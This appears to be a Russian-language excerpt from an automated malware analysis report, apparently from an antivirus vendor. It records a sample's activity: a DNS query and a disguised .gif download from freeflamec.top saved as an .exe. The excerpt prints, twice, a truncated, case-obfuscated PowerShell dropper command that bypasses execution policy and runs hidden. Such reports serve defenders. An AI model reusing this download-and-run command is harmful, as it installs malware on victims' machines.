Техническая информация
- http://www.freeflamec.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowERSHelL.EXe -eXEcUTionpOLICY bypasS -nOPRoFile -WIndoWstyle HIdDEn (New-OBjeCt sYSteM.Net.WebCliEnT).doWnlOADfile('http://www.freeflamec.top/read.php?f=1.gif','%ApPdaTA%.ExE...
- DNS ASK fr###lamec.top
- '<SYSTEM32>\cmd.exe' /C "PowERSHelL.EXe -eXEcUTionpOLICY bypasS -nOPRoFile -WIndoWstyle HIdDEn (New-OBjeCt sYSteM.Net.WebCliEnT).doWnlOADfile('http://www.freeflamec.top/read.php?f=1.gif','%ApPdaTA%.ExE...' (со скрытым окном)